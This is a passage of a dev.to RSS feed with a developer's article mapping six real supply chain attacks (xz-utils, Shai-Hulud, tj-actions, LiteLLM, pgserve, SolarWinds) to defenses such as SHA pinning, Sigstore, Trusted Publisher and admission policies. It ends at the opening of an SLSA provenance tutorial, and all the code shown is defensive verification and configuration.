&lt;li&gt;&lt;a href="https://checkmarx.com/blog/persistent-threat-new-exploit-puts-thousands-of-github-repositories-and-millions-of-users-at-risk/" rel="noopener noreferrer"&gt;GitHub RepoJacking via race condition | Checkmarx&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github" rel="noopener noreferrer"&gt;Anyone can Access Deleted and Private Repository Data on GitHub | Truffle Security&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://trufflesecurity.com/blog/guest-post-how-i-scanned-all-of-github-s-oops-commits-for-leaked-secrets" rel="noopener noreferrer"&gt;Force Push Scanner | Truffle Security&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://securitylab.github.com/resources/github-actions-preventing-pwn-requests/" rel="noopener noreferrer"&gt;Keeping your GitHub Actions secure: Pwn Requests | GitHub Security Lab&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://snyk.io/blog/ultralytics-ai-pwn-request-supply-chain-attack/" rel="noopener noreferrer"&gt;Ultralytics AI Pwn Request Supply Chain Attack | Snyk&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/" rel="noopener noreferrer"&gt;The Monsters in Your Build Cache: GitHub Actions Cache Poisoning | Adnan Khan&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.sysdig.com/blog/how-threat-actors-are-using-self-hosted-github-actions-runners-as-backdoors" rel="noopener noreferrer"&gt;How threat actors are using self-hosted GitHub Actions runners as backdoors | Sysdig&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>security</category>
      <category>github</category>
      <category>git</category>
      <category>supplychain</category>
    </item>
    <item>
      <title>I built chainscope: reading supply chain attacks across 6 surfaces, one slide at a time</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Wed, 29 Apr 2026 15:05:15 +0000</pubDate>
      <link>https://dev.to/kanywst/i-built-chainscope-reading-supply-chain-attacks-across-6-surfaces-one-slide-at-a-time-28mc</link>
      <guid>https://dev.to/kanywst/i-built-chainscope-reading-supply-chain-attacks-across-6-surfaces-one-slide-at-a-time-28mc</guid>
      <description>&lt;h1&gt;
  
  
  Introduction
&lt;/h1&gt;

&lt;p&gt;On 2025-03-14, the GitHub Action &lt;code&gt;tj-actions/changed-files&lt;/code&gt; was hijacked. CVE-2025-30066. The blast radius: 23,000 repositories, 15 hours.&lt;/p&gt;

&lt;p&gt;When a workflow says &lt;code&gt;uses: tj-actions/changed-files@v44&lt;/code&gt;, that &lt;code&gt;v44&lt;/code&gt; is a &lt;strong&gt;tag&lt;/strong&gt;. A tag is just a label pointing at a commit SHA, and on git, &lt;strong&gt;tags are rewritable&lt;/strong&gt;. With the maintainer's GitHub Token in hand, the attacker &lt;strong&gt;rewrote every tag from &lt;code&gt;v1&lt;/code&gt; through &lt;code&gt;v45&lt;/code&gt;&lt;/strong&gt; to point at a single malicious commit.&lt;/p&gt;

&lt;p&gt;Any CI that wrote &lt;code&gt;uses: ...@v44&lt;/code&gt; started running the malicious Action on its very next run, without changing anything on its side. The Action scraped AWS / GitHub / PyPI tokens out of the runner's memory and dumped them, base64-encoded, into the &lt;strong&gt;public job log&lt;/strong&gt;. Public GitHub Actions logs are world-readable, so the leak was complete right there.&lt;/p&gt;

&lt;p&gt;The headlines say "another supply chain attack". But put this next to the 2024 xz-utils backdoor and you'll see that the spot that got hit, and the defense that actually works, are nothing alike.&lt;/p&gt;

&lt;p&gt;I tried to fit that difference into one diagram, failed, and ended up making slides. That became &lt;a href="https://0-draft.github.io/chainscope" rel="noopener noreferrer"&gt;&lt;strong&gt;chainscope&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff6dsu76nktml4obecgjs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff6dsu76nktml4obecgjs.png" alt="screenshot" width="800" height="430"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Background
&lt;/h2&gt;

&lt;p&gt;A few terms up front make the rest go faster.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Mutable tag&lt;/strong&gt;: a git tag is a label pointing at a commit SHA, and it can be moved later. The &lt;code&gt;v1&lt;/code&gt; in &lt;code&gt;uses: org/action@v1&lt;/code&gt; resolves to &lt;strong&gt;whatever SHA it points at right now&lt;/strong&gt; when CI runs. A pinned commit SHA (&lt;code&gt;@a284dc1aef...&lt;/code&gt;) is immutable.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;postinstall script&lt;/strong&gt;: an npm package can run any shell command listed in &lt;code&gt;package.json&lt;/code&gt;'s &lt;code&gt;scripts.postinstall&lt;/code&gt;, fired immediately after &lt;code&gt;npm install&lt;/code&gt;. Lockfile hashes pin the tarball, but they say nothing about what postinstall does.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OIDC Trusted Publisher&lt;/strong&gt;: PyPI / npm gating publishing on a GitHub Actions workflow's execution identity (OIDC token). &lt;strong&gt;Stealing the maintainer's password gets you nothing if you can't publish from their workflow.&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sigstore&lt;/strong&gt;: signature verification for published artifacts, backed by OIDC identity and a transparency log (Rekor). Used via &lt;code&gt;cosign verify-blob&lt;/code&gt; and friends.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Admission Controller (e.g. Kyverno)&lt;/strong&gt;: enforces policy at the moment a container image lands on a Kubernetes cluster. "Refuse to start unless the expected signature is present" is exactly its job.&lt;/li&gt;
&lt;/ul&gt;
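&lt;p&gt;The "mutable tag" point takes four git commands to see for yourself; a sketch in a throwaway repo:&lt;/p&gt;

```shell
# A tag is a movable label; a commit SHA is not.
set -e
tmp=$(mktemp -d)
cd "$tmp"
git init -q
git -c user.email=a@x -c user.name=a commit --allow-empty -qm "v1: legit"
git tag v1
PINNED=$(git rev-parse v1)
git -c user.email=a@x -c user.name=a commit --allow-empty -qm "v1: malicious"
git tag -f v1                              # same name, silently re-pointed
test "$(git rev-parse v1)" != "$PINNED"    # @v1 now resolves differently...
git log -1 --format=%s "$PINNED"           # ...the pinned SHA still means "v1: legit"
```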




&lt;h2&gt;
  
  
  The software supply chain is not a single line
&lt;/h2&gt;

&lt;p&gt;From source to production, an artifact passes through 6 stages.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi34up90paoewcsbb9sm8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi34up90paoewcsbb9sm8.png" alt="software-supply-chain" width="800" height="105"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Colors are lifted straight from each stage's flagship tool: &lt;code&gt;source = #f05032&lt;/code&gt; (Git orange), &lt;code&gt;deps = #cb3837&lt;/code&gt; (npm red), &lt;code&gt;build = #2088ff&lt;/code&gt; (GitHub Actions blue), &lt;code&gt;consume = #326ce5&lt;/code&gt; (Kubernetes blue). Idea being, the color alone tells you which stage you're looking at.&lt;/p&gt;

&lt;p&gt;Attackers only need to own one of the six. Defenders need a separate layer at every one, or they lose somewhere. chainscope calls them "surfaces".&lt;/p&gt;




&lt;h2&gt;
  
  
  6 incidents
&lt;/h2&gt;

&lt;p&gt;One real incident per stage. Goal: next time the news breaks, you can immediately shelve it as "oh, that's a 03 one".&lt;/p&gt;

&lt;h3&gt;
  
  
  01 SOURCE: xz-utils backdoor (2024-03-29)
&lt;/h3&gt;

&lt;p&gt;CVE-2024-3094, CVSS 10.0. "Jia Tan" spent 2 years working their way into a maintainer slot on xz and, in the end, planted a backdoor &lt;strong&gt;only in the release tarballs, never in the Git tree&lt;/strong&gt;. The trick: hiding the payload inside test fixtures so the sshd backdoor wired itself in only at build time. Andres Freund (a PostgreSQL core dev) caught it by accident, from &lt;code&gt;valgrind&lt;/code&gt; noise.&lt;/p&gt;

&lt;p&gt;What works here is &lt;strong&gt;commit signing plus reproducible builds, together&lt;/strong&gt;. &lt;code&gt;gitsign&lt;/code&gt;-style commit signing pins commits to a real OIDC identity. Reproducible builds let you check bit-for-bit equality between the tarball built from the Git tree and the official release tarball. Without the latter, the "plant it only in the tarball" trick from xz walks right through.&lt;/p&gt;
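&lt;p&gt;The reproducible-build half can be sketched in a few lines. This shows the core check for a plain &lt;code&gt;git archive&lt;/code&gt; tarball; xz's real autotools release flow (&lt;code&gt;make dist&lt;/code&gt;) has more moving parts:&lt;/p&gt;

```shell
# Reproducible-build smoke test: archiving the same tagged commit twice
# must be bit-for-bit identical (git pins mtimes to the commit time).
set -e
tmp=$(mktemp -d)
cd "$tmp"
git init -q
printf 'hello\n' | tee README.md
git add README.md
git -c user.email=a@x -c user.name=a commit -qm "release v1.0"
git tag v1.0
H1=$(git archive --format=tar v1.0 | sha256sum | cut -d " " -f1)
H2=$(git archive --format=tar v1.0 | sha256sum | cut -d " " -f1)
test "$H1" = "$H2"
# The real check: compare H1 against the checksum of the official release tarball.
echo "$H1"
```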

&lt;h3&gt;
  
  
  02 DEPS: Shai-Hulud npm worm (2025-09-14)
&lt;/h3&gt;

&lt;p&gt;The first &lt;strong&gt;self-propagating worm&lt;/strong&gt; on a public registry. The attacker phished npm maintainers with mail dressed up as "npm security alert" and grabbed their credentials. With the stolen npm tokens, they pushed malicious packages.&lt;/p&gt;

&lt;p&gt;When a dev ran &lt;code&gt;npm install&lt;/code&gt; and pulled one of those in, &lt;strong&gt;postinstall&lt;/strong&gt; fired: it lifted local &lt;code&gt;NPM_TOKEN&lt;/code&gt; / &lt;code&gt;GH_TOKEN&lt;/code&gt; / &lt;code&gt;~/.pypirc&lt;/code&gt;, then &lt;strong&gt;injected the same malicious code into every package that dev owned and republished the lot&lt;/strong&gt;. Every victim launched the next wave. No human in the loop, just lateral spread. By 2025-09-16 over 180 packages had been hit. On 2025-11-24 Shai-Hulud 2.0 turned up, dragging in nearly 800 packages (20 million weekly downloads combined).&lt;/p&gt;

&lt;p&gt;What works: &lt;strong&gt;a hash-pinned lockfile plus SBOM diffing&lt;/strong&gt;. Use &lt;code&gt;npm ci&lt;/code&gt; (which fails when hashes don't match the lockfile) instead of &lt;code&gt;npm install&lt;/code&gt; (which re-resolves), emit an SBOM every build, diff against the previous one. Code that's been silently swapped shows up as something foreign, not as an update. Turning postinstall off with &lt;code&gt;--ignore-scripts&lt;/code&gt; is also worth wiring in as the CI default.&lt;/p&gt;
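&lt;p&gt;The postinstall half of that fits in one line of repo config; a sketch:&lt;/p&gt;

```ini
# .npmrc at the repo root: no lifecycle scripts by default,
# for every `npm install` and `npm ci` run in this repo
ignore-scripts=true
```

&lt;p&gt;Pair it with &lt;code&gt;npm ci&lt;/code&gt; in CI, which fails hard on any lockfile hash mismatch instead of quietly re-resolving.&lt;/p&gt;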

&lt;h3&gt;
  
  
  03 BUILD: tj-actions/changed-files (2025-03-14)
&lt;/h3&gt;

&lt;p&gt;The one from the intro. The &lt;strong&gt;tag&lt;/strong&gt; in &lt;code&gt;uses: tj-actions/changed-files@v44&lt;/code&gt; got moved to point at a malicious commit. 23,000 repos ran it for 15 hours, and CI secrets were base64-spilled into public logs. CVE-2025-30066.&lt;/p&gt;

&lt;p&gt;What works: &lt;strong&gt;pin by commit SHA, plus SLSA Provenance&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;tj-actions/changed-files@a284dc1aef0bee7&lt;/span&gt;  &lt;span class="c1"&gt;# full SHA, not @v44&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A commit SHA can't move, so "quietly retag" attacks don't land. Layer SLSA Provenance on top and you get a signed attestation of &lt;strong&gt;which commit, which builder, which inputs, which environment&lt;/strong&gt; produced the artifact. Consumers verify it with &lt;code&gt;slsa-verifier verify-artifact&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  04 PUBLISH: TeamPCP / LiteLLM (2026-03-24)
&lt;/h3&gt;

&lt;p&gt;The PyPI package for LiteLLM (an LLM proxy doing 95 million downloads a month) got compromised. The path in is the clever part. The crew, TeamPCP, &lt;strong&gt;had already compromised Trivy&lt;/strong&gt; (the vulnerability scanner) earlier on, and LiteLLM's CI pulled poisoned Trivy in through &lt;code&gt;apt install trivy&lt;/code&gt; (no version pin). The poisoned Trivy then exfiltrated the runner's &lt;code&gt;PYPI_PUBLISH&lt;/code&gt; token.&lt;/p&gt;

&lt;p&gt;With the stolen token they pushed &lt;code&gt;litellm 1.82.7&lt;/code&gt; (10:39 UTC) and &lt;code&gt;1.82.8&lt;/code&gt; (10:52 UTC). Those sat on PyPI for about 40 minutes before quarantine. Payload: credential stealer, lateral movement into Kubernetes, persistent backdoor. Stolen data POSTed to &lt;code&gt;models.litellm.cloud&lt;/code&gt; (not the real domain).&lt;/p&gt;

&lt;p&gt;What works: &lt;strong&gt;Sigstore plus Trusted Publisher (OIDC)&lt;/strong&gt;. Signing and publishing are bound to the GitHub Actions workflow run ID, so &lt;strong&gt;a stolen token can't publish from anywhere else&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;cosign verify-blob litellm-1.82.8.tar.gz &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--certificate-identity-regexp&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="s1"&gt;'https://github.com/BerriAI/litellm/.github/workflows/publish.yml@.*'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--certificate-oidc-issuer&lt;/span&gt; https://token.actions.githubusercontent.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And: &lt;strong&gt;pin every tool CI uses by SHA or version&lt;/strong&gt;. Just refusing to run a bare &lt;code&gt;apt install foo&lt;/code&gt; would have closed off the entry point for this one.&lt;/p&gt;

&lt;h3&gt;
  
  
  05 DISTRIBUTE: pgserve / CanisterSprawl (2026-04-21)
&lt;/h3&gt;

&lt;p&gt;The maintainer account for &lt;code&gt;pgserve&lt;/code&gt; (a PostgreSQL helper for Node.js) got compromised. &lt;strong&gt;Not typosquatting: the real, official package&lt;/strong&gt; was shipped as a malicious version (StepSecurity tracks it as "CanisterSprawl"). First malicious version at 22:14 UTC, two more on the same day.&lt;/p&gt;

&lt;p&gt;The postinstall hook, on every &lt;code&gt;npm install&lt;/code&gt;, hoovered up everything in reach: &lt;code&gt;NPM_TOKEN&lt;/code&gt; / &lt;code&gt;GH_TOKEN&lt;/code&gt; / SSH keys / cloud credentials / Kubernetes config / Docker config, plus LLM-platform keys. It also &lt;strong&gt;republished every package the victim could publish to, spreading itself&lt;/strong&gt; (same pattern as Shai-Hulud). If it landed Python-side credentials, a &lt;code&gt;.pth&lt;/code&gt;-based payload pivoted onto PyPI as well. Unusual detail: alongside the regular webhook, stolen data was POSTed to an ICP (Internet Computer) canister, &lt;code&gt;cjn37-uyaaa-aaaac-qgnva-cai&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;What works: &lt;strong&gt;registry-side Sigstore Attestation verification&lt;/strong&gt; plus &lt;strong&gt;postinstall off&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;npm &lt;span class="nb"&gt;install &lt;/span&gt;pgserve &lt;span class="nt"&gt;--ignore-scripts&lt;/span&gt;
&lt;span class="nv"&gt;$ &lt;/span&gt;npm audit signatures
  -&amp;gt; attestation issuer &lt;span class="o"&gt;!=&lt;/span&gt; expected workflow
  -&amp;gt; &lt;span class="nb"&gt;install &lt;/span&gt;rejected
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Since 2024, npm has been distributing Sigstore Attestations through the registry, and &lt;code&gt;npm audit signatures&lt;/code&gt; checks at install time whether the package was signed by the expected GitHub workflow ID. With Trusted Publisher mandated, a stolen maintainer password alone doesn't let you publish. &lt;code&gt;--ignore-scripts&lt;/code&gt; (postinstall off) sits on the &lt;strong&gt;damage-after-entry&lt;/strong&gt; side, and is worth making the CI default.&lt;/p&gt;

&lt;h3&gt;
  
  
  06 CONSUME: SUNSPOT / SolarWinds (2020-12-13)
&lt;/h3&gt;

&lt;p&gt;Older, but it anchors the shape of the problem. Attackers got onto the &lt;strong&gt;build server&lt;/strong&gt; for SolarWinds Orion and planted a tool (SUNSPOT) that swapped sources only at the moment of build. The resulting binary went through the legitimate pipeline, signed with the legitimate key, and shipped via auto-update to thousands of customers. The payload was the SUNBURST malware. FireEye disclosed on 2020-12-13.&lt;/p&gt;

&lt;p&gt;This happens even with a perfectly legitimate signature attached. What works: &lt;strong&gt;cosign verify plus admission policy plus VEX&lt;/strong&gt;. Not "signed by someone somewhere" but "&lt;strong&gt;signed by the expected OIDC subject (e.g. our specific workflow)&lt;/strong&gt;", enforced at admission time by a Kubernetes admission controller (Kyverno or similar).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;kyverno.io/v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ClusterPolicy&lt;/span&gt;
&lt;span class="s"&gt;spec.rules[0].verifyImages&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;imageReferences&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;*'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
  &lt;span class="s"&gt;attestors[0].entries[0].keyless.subject&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;
    &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;https://github.com/me/repo/.github/workflows/ci.yml@*'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  A single mapping table
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Stage&lt;/th&gt;
&lt;th&gt;Incident&lt;/th&gt;
&lt;th&gt;Effective defense&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;01&lt;/td&gt;
&lt;td&gt;source&lt;/td&gt;
&lt;td&gt;xz-utils backdoor&lt;/td&gt;
&lt;td&gt;gitsign + reproducible builds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;02&lt;/td&gt;
&lt;td&gt;deps&lt;/td&gt;
&lt;td&gt;Shai-Hulud worm&lt;/td&gt;
&lt;td&gt;npm ci + SBOM diff + --ignore-scripts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;03&lt;/td&gt;
&lt;td&gt;build&lt;/td&gt;
&lt;td&gt;tj-actions/changed-files&lt;/td&gt;
&lt;td&gt;SHA pin + SLSA Provenance&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;04&lt;/td&gt;
&lt;td&gt;publish&lt;/td&gt;
&lt;td&gt;TeamPCP / LiteLLM&lt;/td&gt;
&lt;td&gt;Sigstore + Trusted Publisher (OIDC)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;05&lt;/td&gt;
&lt;td&gt;distribute&lt;/td&gt;
&lt;td&gt;pgserve / CanisterSprawl&lt;/td&gt;
&lt;td&gt;npm audit signatures + --ignore-scripts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;06&lt;/td&gt;
&lt;td&gt;consume&lt;/td&gt;
&lt;td&gt;SUNSPOT / SolarWinds&lt;/td&gt;
&lt;td&gt;cosign + Kyverno admission policy&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Attackers win by breaking any one of the six. Defenders need a separate layer at every one, or they lose somewhere.&lt;/p&gt;




&lt;h2&gt;
  
  
  Try it
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://0-draft.github.io/chainscope" rel="noopener noreferrer"&gt;https://0-draft.github.io/chainscope&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;space&lt;/code&gt; to advance, &lt;code&gt;←&lt;/code&gt; to go back, &lt;code&gt;r&lt;/code&gt; to restart. 22 slides, one lap in 5 minutes.&lt;/p&gt;

&lt;p&gt;Got an incident I should add, or a difference I called wrong? File on &lt;a href="https://github.com/0-draft/chainscope/issues" rel="noopener noreferrer"&gt;GitHub Issues&lt;/a&gt; or drop a comment.&lt;/p&gt;




&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.openwall.com/lists/oss-security/2024/03/29/4" rel="noopener noreferrer"&gt;Andres Freund disclosure (xz-utils CVE-2024-3094)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://research.swtch.com/xz-script" rel="noopener noreferrer"&gt;Russ Cox xz reconstruction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://unit42.paloaltonetworks.com/npm-supply-chain-attack/" rel="noopener noreferrer"&gt;Unit 42: Shai-Hulud npm worm&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.cisa.gov/news-events/alerts/2025/09/23/widespread-supply-chain-compromise-impacting-npm-ecosystem" rel="noopener noreferrer"&gt;CISA: Shai-Hulud alert&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.cisa.gov/news-events/alerts/2025/03/18/supply-chain-compromise-third-party-tj-actionschanged-files-cve-2025-30066-and-reviewdogaction" rel="noopener noreferrer"&gt;CISA: tj-actions/changed-files (CVE-2025-30066)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.wiz.io/blog/github-action-tj-actions-changed-files-supply-chain-attack-cve-2025-30066" rel="noopener noreferrer"&gt;Wiz: tj-actions analysis&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://securitylabs.datadoghq.com/articles/litellm-compromised-pypi-teampcp-supply-chain-campaign/" rel="noopener noreferrer"&gt;Datadog Security Labs: TeamPCP / LiteLLM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.litellm.ai/blog/security-update-march-2026" rel="noopener noreferrer"&gt;LiteLLM official security update (March 2026)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.stepsecurity.io/blog/pgserve-compromised-on-npm-malicious-versions-harvest-credentials" rel="noopener noreferrer"&gt;StepSecurity: pgserve / CanisterSprawl&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://thehackernews.com/2026/04/self-propagating-supply-chain-worm.html" rel="noopener noreferrer"&gt;The Hacker News: self-propagating npm worm (pgserve)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/" rel="noopener noreferrer"&gt;CrowdStrike: SUNSPOT analysis&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a" rel="noopener noreferrer"&gt;CISA: SolarWinds advisory&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>security</category>
      <category>supplychain</category>
      <category>showdev</category>
    </item>
    <item>
      <title>SLSA Provenance Hands-on: Generate with GitHub Actions, Verify with slsa-verifier</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Wed, 29 Apr 2026 07:38:30 +0000</pubDate>
      <link>https://dev.to/kanywst/slsa-provenance-hands-on-generate-with-github-actions-verify-with-slsa-verifier-56ka</link>
      <guid>https://dev.to/kanywst/slsa-provenance-hands-on-generate-with-github-actions-verify-with-slsa-verifier-56ka</guid>
      <description>&lt;h1&gt;
  
  
  Introduction
&lt;/h1&gt;

&lt;p&gt;I wrote &lt;a href="https://dev.to/kanywst/supply-chain-security-a-deep-dive-into-sbom-and-code-signing-2n1l"&gt;Supply Chain Security: A Deep Dive into SBOM and Code Signing&lt;/a&gt; earlier. That post pinned down "what's in it" via SBOM and "who signed it" via Cosign.&lt;/p&gt;

&lt;p&gt;But even with both of those, there's still a hole.&lt;/p&gt;

&lt;p&gt;SolarWinds' &lt;strong&gt;SUNSPOT&lt;/strong&gt; was malware that lived on the build server, swapped the source code the moment a build started, and put it back when the build finished. The resulting binaries were signed with the legitimate certificate. Signatures: perfect. SBOMs: clean. And the world still got a backdoor distributed to it.&lt;/p&gt;

&lt;p&gt;Why? Signatures only prove "I signed this with this key." SBOMs only describe "what was in the artifact at build time." &lt;strong&gt;Nobody was verifying "was this really built from the right source, on an unaltered builder, following the steps it claims?"&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The thing that closes that hole is &lt;strong&gt;Provenance&lt;/strong&gt;. SLSA (Supply-chain Levels for Software Artifacts) is a framework built around provenance, treating "from where (source), how (build), by what (builder)" as verifiable metadata.&lt;/p&gt;

&lt;p&gt;I covered the spec in &lt;a href="https://dev.to/kanywst/slsa-deep-dive-securing-the-supply-chain-using-verifiable-levels-klk"&gt;SLSA Deep Dive&lt;/a&gt;. This is the follow-up: &lt;strong&gt;actually generating SLSA L3 provenance and verifying it on real machines&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;What we're doing:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Verify a public &lt;code&gt;slsa-verifier&lt;/code&gt; v2.7.1 release using its bundled provenance (and demonstrate tampering detection)&lt;/li&gt;
&lt;li&gt;Plug &lt;code&gt;slsa-github-generator&lt;/code&gt; into a Go project so that pushing a tag automatically emits SLSA L3 provenance&lt;/li&gt;
&lt;li&gt;Read the JSON inside and understand exactly what is being attested&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  Before you read on
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Provenance / Attestation / in-toto / DSSE
&lt;/h3&gt;

&lt;p&gt;The terminology is slippery, so let's pin it down first.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fei62txenvyrk9v4ow7p0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fei62txenvyrk9v4ow7p0.png" alt="Layer" width="539" height="824"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;in-toto Statement&lt;/strong&gt;: a JSON structure that says "for this subject (the artifact), I am stating this predicate (the claim)"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Attestation&lt;/strong&gt;: an in-toto Statement plus a signature. Any "signed claim about an artifact"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Provenance&lt;/strong&gt;: an attestation that specifically describes "how it was built" (&lt;code&gt;predicateType: https://slsa.dev/provenance/v1&lt;/code&gt;; older builders still emit &lt;code&gt;v0.2&lt;/code&gt;, which is what we'll see later)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;DSSE (Dead Simple Signing Envelope)&lt;/strong&gt;: an envelope format for signed JSON. The payload is base64-wrapped on the inside, and the signature wraps the outside&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;So a SLSA Provenance is "an in-toto Statement whose predicate matches the SLSA spec, signed inside a DSSE envelope."&lt;/p&gt;
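&lt;p&gt;To make the layering concrete, here is a sketch that wraps a toy in-toto Statement in a DSSE-shaped envelope. The statement body and the dummy signature are invented for illustration; a real envelope carries an actual signature computed over the payload.&lt;/p&gt;

```shell
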